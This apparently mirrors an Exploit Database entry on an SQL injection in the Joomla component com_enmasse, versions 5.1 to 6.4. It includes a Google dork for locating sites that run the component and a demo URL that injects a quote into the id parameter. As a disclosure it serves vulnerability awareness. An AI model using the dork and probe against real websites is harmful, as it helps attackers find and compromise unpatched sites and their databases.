Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection

• Exploit Database
• 14 阅读

• 作者： Hamed Izadi
  日期： 2016-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39953/

• # Exploit Title: Joomla com_enmasse- SQL Injection
   
   # Author: [ Hamed Izadi ]
  
  						#IRAN
  
  # Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
  # Category: [ Webapps ]
  # Tested on: [ Win ]
  # Versions: 5.1-6.4
  # Date: 2016/06/15
  # Google Dork: inurl:component/enmasse/
  
  
  # PoC:
  # id Parameter Vulnerable To SQL
   
  # Demo:
  # http://server/component/enmasse/term?tmpl=component&id=2%27
  
  
  # Youtube: https://youtu.be/LB5qVnXhzXE
  
  #L u Arg